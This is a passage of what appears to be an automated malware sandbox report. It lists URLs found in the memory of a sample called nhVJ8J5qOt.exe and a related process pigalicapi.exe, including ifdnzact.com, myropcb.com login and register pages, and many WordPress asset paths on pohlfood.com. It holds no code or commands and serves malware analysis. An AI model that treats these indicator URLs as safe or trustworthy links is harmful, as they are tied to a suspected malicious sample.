nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ifdnzact.com/?dn=x0c.com&pid=9PO755G95
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.521508837.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.520474441.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.519635310.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.643655921.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com/login/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com/register/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.739674320.00000000076A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://orb.reglera.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.739674320.00000000076A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pcc.medius.si/
                  Source: pigalicapi.exe, 00000001.00000003.740633377.00000000050B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pcgrate.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.14.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.14.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.min.js?ve
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.14.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.min.js?
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=3.14
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/css/frontend-legacy.min.css?ver=3.14.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.14.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.14.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.14.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.14.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.14.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.14.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.9.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=3.14.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.min.css?ver=3.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=3.14
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.14.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/swiper/css/swiper.min.css?ver=5.3.6
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.50
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/js/ooohboi-steroids.js?
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/pojo-accessibility/assets/css/style.min.css?ver=1.0.0
